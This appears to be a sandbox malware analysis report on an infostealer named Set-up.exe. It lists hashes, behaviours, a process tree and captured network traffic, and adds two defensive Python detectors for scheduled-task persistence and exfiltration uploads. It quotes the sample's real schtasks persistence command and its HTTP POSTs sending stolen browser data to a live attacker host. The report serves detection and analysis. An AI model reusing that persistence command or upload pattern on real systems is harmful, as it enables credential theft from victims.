
Analysis

  • max time kernel
    140s
  • max time network
    144s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    2024-10-03, 22:01 UTC

General

  • Target

    Set-up.exe

  • Size

    6.7MB

  • MD5

    e8f6d16ad939c06d972ed7afb3bcf335

  • SHA1

    a7c1b12fc853a28d468b5fa9bc7e6be63a05b4f2

  • SHA256

    5df593109be04e8263413ee6afbebe8f136cd0136e2fc7b070a19099f7ab015d

  • SHA512

    79d4a997a9a85f76871d9f5df74444f481de040651c904007ff5a626ecd7f5cdd5ecb47d274d82351d49f5de71cdff0502fc2b0735897844ee19cf79bb5498e6

  • SSDEEP

    196608:gONiBa+mq9aq5g7PLnYiJGb6/CdnK8dN:gONiBa+mq9aq5g7PLnYiJGbb

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Set-up.exe
    "C:\Users\Admin\AppData\Local\Temp\Set-up.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious use of WriteProcessMemory
    PID:3172
    • C:\Users\Admin\AppData\Local\Temp\service123.exe
      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:3048
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1644
  • C:\Users\Admin\AppData\Local\Temp\service123.exe
    C:\Users\Admin\AppData\Local\Temp\/service123.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:3596
  • C:\Users\Admin\AppData\Local\Temp\service123.exe
    C:\Users\Admin\AppData\Local\Temp\/service123.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    PID:2708
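
The task created by PID 1644 is registered with /sc once, but /ri 1 and /du 9800:59 make it re-run service123.exe about once a minute for roughly 408 days; the two later service123.exe instances (PIDs 3596 and 2708) carry the task's exact command line, including the stray \/ separator, and are that task firing. The schtasks.exe image resolves to SysWOW64 because the 32-bit parent is subject to WoW64 file-system redirection. The following Python is an added example, not part of the tria.ge report or of the sample: it parses a schtasks.exe /create command line into its switches and flags that combination. REPORT_CMDLINE is the command line from the process tree above; BENIGN_CMDLINE is a constructed control, and the 5-minute and 30-day thresholds are assumptions to tune for your own environment.

```python
"""Score schtasks.exe /create command lines for the persistence pattern in this report.

Added example, not part of the tria.ge report or of the sample. REPORT_CMDLINE is
the command line from the process tree (PID 1644); BENIGN_CMDLINE is a constructed
control. Thresholds (5 minutes, 30 days) are assumptions to tune for your estate.
"""
import re

REPORT_CMDLINE = (
    r'"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" '
    r'/tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" '
    r'/st 00:01 /du 9800:59 /sc once /ri 1 /f'
)
BENIGN_CMDLINE = (
    r'"C:\Windows\System32\schtasks.exe" /create /tn "NightlyBackup" '
    r'/tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'
)

# schtasks /create switches that take no argument
VALUELESS = {"/f", "/z", "/np", "/it", "/v1"}
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def tokenize(cmdline):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_schtasks(cmdline):
    """Map each /switch (lower-cased) to its argument, or True for bare switches."""
    tokens = tokenize(cmdline)
    opts, i = {}, 1  # token 0 is the schtasks.exe image path
    while i < len(tokens):
        tok = tokens[i].lower()
        if not tok.startswith("/"):
            i += 1
            continue
        has_value = (tok not in VALUELESS and i + 1 < len(tokens)
                     and not tokens[i + 1].startswith("/"))
        opts[tok] = tokens[i + 1] if has_value else True
        i += 2 if has_value else 1
    return opts


def duration_minutes(du):
    """/du is HHHH:MM; the report's 9800:59 is about 408 days."""
    hours, minutes = du.split(":")
    return int(hours) * 60 + int(minutes)


def analyze(cmdline):
    """Return task name, action and the list of indicators the command line trips."""
    opts = parse_schtasks(cmdline)
    findings = []
    if "/create" not in opts:
        return {"task": None, "action": None, "findings": findings}
    action = opts.get("/tr", "")
    if USER_TEMP.search(action):
        findings.append("payload_in_user_temp")
    if "\\/" in action or "/\\" in action:
        findings.append("mixed_path_separators")  # the Temp\/service123.exe artifact
    if opts.get("/sc", "").lower() == "once" and "/ri" in opts:
        findings.append("once_with_repetition")  # 'once' plus /ri is really recurring
    if "/ri" in opts and str(opts["/ri"]).isdigit() and int(opts["/ri"]) <= 5:
        findings.append("repeat_interval_le_5min")
    if "/du" in opts and duration_minutes(opts["/du"]) >= 30 * 24 * 60:
        findings.append("duration_ge_30_days")
    if "/f" in opts:
        findings.append("force_overwrite")
    return {"task": opts.get("/tn"), "action": action, "findings": findings}


if __name__ == "__main__":
    for line in (REPORT_CMDLINE, BENIGN_CMDLINE):
        result = analyze(line)
        print(result["task"], "->", result["action"], result["findings"])
```

The same parser can be pointed at Security event 4698 (task created) or Sysmon event 1 command lines; the /sc once plus /ri combination is worth alerting on by itself, since legitimate one-shot tasks rarely carry a repetition interval.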

Network

  • Remote country: US
    DNS
    thirtvx13pt.top
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    thirtvx13pt.top
    IN A
    Response
    thirtvx13pt.top
    IN A
    185.244.181.140
  • Remote country: US
    DNS
    8.8.8.8.in-addr.arpa
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dns.google
  • Remote country: US
    DNS
    nexusrules.officeapps.live.com
    Set-up.exe
    Remote address:
    8.8.8.8:53
    Request
    nexusrules.officeapps.live.com
    IN A
    Response
    nexusrules.officeapps.live.com
    IN CNAME
    prod.nexusrules.live.com.akadns.net
    prod.nexusrules.live.com.akadns.net
    IN A
    52.111.229.19
  • Remote country: RU
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary87984241
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 411
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:29 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • Remote country: US
    DNS
    140.181.244.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    140.181.244.185.in-addr.arpa
    IN PTR
    Response
    140.181.244.185.in-addr.arpa
    IN PTR
    v982091macloudhost
  • Remote country: US
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • Remote country: RU
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary67913200
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 77003
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:33 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • Remote country: RU
    POST
    http://thirtvx13pt.top/v1/upload.php
    Set-up.exe
    Remote address:
    185.244.181.140:80
    Request
    POST /v1/upload.php HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: multipart/form-data; boundary=----Boundary72653909
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
    Content-Length: 24618
    Host: thirtvx13pt.top
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.24.0 (Ubuntu)
    Date: Thu, 03 Oct 2024 22:02:36 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 2
    Connection: close
    ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    1.0kB
    381 B
    6
    4

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    79.8kB
    1.5kB
    62
    32

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 185.244.181.140:80
    http://thirtvx13pt.top/v1/upload.php
    http
    Set-up.exe
    25.9kB
    981 B
    24
    19

    HTTP Request

    POST http://thirtvx13pt.top/v1/upload.php

    HTTP Response

    200
  • 8.8.8.8:53
    thirtvx13pt.top
    dns
    Set-up.exe
    203 B
    308 B
    3
    3

    DNS Request

    thirtvx13pt.top

    DNS Response

    185.244.181.140

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    nexusrules.officeapps.live.com

    DNS Response

    52.111.229.19

  • 8.8.8.8:53
    140.181.244.185.in-addr.arpa
    dns
    146 B
    266 B
    2
    2

    DNS Request

    140.181.244.185.in-addr.arpa

    DNS Request

    19.229.111.52.in-addr.arpa
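
The three POSTs above are multipart/form-data uploads of 411, 77003 and 24618 bytes to /v1/upload.php over plaintext HTTP, each answered with a 2-byte body, and all sent by Set-up.exe under a Chrome 122 User-Agent, which is the classic shape of an infostealer handing off its collected browser data right after the "Reads user/profile data of web browsers" signature fires. The following Python is an added example and not part of the tria.ge report: it scores flow records for those indicators and totals upload volume per process and host so that several modest POSTs are judged together. The Set-up.exe records are reconstructed from the request headers shown above; the chrome.exe record is a constructed benign control, and the browser image list and the thresholds (8-byte acknowledgement, three indicators) are assumptions.

```python
"""Flag HTTP uploads that look like infostealer exfiltration.

Added example, not part of the tria.ge report. The Set-up.exe flow records are
reconstructed from the report's request headers; the chrome.exe record is a
constructed benign control. Thresholds and the browser image list are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe"}
BROWSER_UA = re.compile(r"^Mozilla/5\.0 .*\b(Chrome|Firefox|Edg)/\d", re.I)
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36")


def flow(process, url, boundary, content_length, response_length, method="POST"):
    """Build one flow record in the shape a proxy or sandbox export might give us."""
    return {
        "process": process, "method": method, "url": url,
        "headers": {
            "Content-Type": f"multipart/form-data; boundary=----Boundary{boundary}",
            "User-Agent": CHROME_UA,
            "Content-Length": str(content_length),
        },
        "response_length": response_length,
    }


FLOWS = [
    flow("Set-up.exe", "http://thirtvx13pt.top/v1/upload.php", "87984241", 411, 2),
    flow("Set-up.exe", "http://thirtvx13pt.top/v1/upload.php", "67913200", 77003, 2),
    flow("Set-up.exe", "http://thirtvx13pt.top/v1/upload.php", "72653909", 24618, 2),
    # constructed benign control: a real browser posting a form over TLS
    flow("chrome.exe", "https://forms.example.com/submit", "00000001", 1500, 4200),
]


def analyze_flow(rec):
    """Return the list of indicators a single request trips."""
    url = urlparse(rec["url"])
    hdr = {k.lower(): v for k, v in rec["headers"].items()}
    upload = int(hdr.get("content-length", "0"))
    findings = []
    if url.scheme == "http":
        findings.append("plaintext_http")
    if rec["method"] == "POST" and hdr.get("content-type", "").startswith("multipart/form-data"):
        findings.append("multipart_upload")
    # a browser UA is only meaningful when a browser sends it
    if BROWSER_UA.match(hdr.get("user-agent", "")) and rec["process"].lower() not in BROWSER_IMAGES:
        findings.append("browser_ua_from_non_browser_process")
    # large request body, near-empty reply: the server only acknowledges receipt
    if upload > 0 and rec["response_length"] is not None and rec["response_length"] <= 8:
        findings.append("bulk_upload_tiny_ack")
    return findings


def is_suspicious(findings):
    """Three or more independent indicators on one request is the alert threshold."""
    return len(findings) >= 3


def summarize(flows):
    """Total upload volume per (process, host) so small POSTs add up."""
    totals = defaultdict(lambda: {"posts": 0, "bytes": 0, "suspicious": 0})
    for rec in flows:
        key = (rec["process"], urlparse(rec["url"]).hostname)
        hdr = {k.lower(): v for k, v in rec["headers"].items()}
        entry = totals[key]
        entry["posts"] += 1
        entry["bytes"] += int(hdr.get("content-length", "0"))
        entry["suspicious"] += int(is_suspicious(analyze_flow(rec)))
    return dict(totals)


if __name__ == "__main__":
    for rec in FLOWS:
        print(rec["process"], rec["url"], analyze_flow(rec))
    for (proc, host), entry in summarize(FLOWS).items():
        print(f"{proc} -> {host}: {entry['posts']} POSTs, {entry['bytes']} bytes, "
              f"{entry['suspicious']} suspicious")
```

On the report's traffic the summary attributes 102032 bytes across three suspicious POSTs to Set-up.exe talking to thirtvx13pt.top, while the browser control trips only the neutral multipart indicator; the per-host total is the number to compare against what the sample was observed reading from browser profiles.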

MITRE ATT&CK Enterprise v15


Downloads

  • memory/2708-43-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB

  • memory/3048-24-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB

  • memory/3048-25-0x00000000753A0000-0x00000000754D4000-memory.dmp

    Filesize

    1.2MB

  • memory/3172-0-0x0000000069CC0000-0x000000006A377000-memory.dmp

    Filesize

    6.7MB

  • memory/3172-9-0x00000000009F0000-0x00000000010A4000-memory.dmp

    Filesize

    6.7MB

  • memory/3172-22-0x00000000009F0000-0x00000000010A4000-memory.dmp

    Filesize

    6.7MB

  • memory/3596-28-0x0000000000C40000-0x0000000000C52000-memory.dmp

    Filesize

    72KB
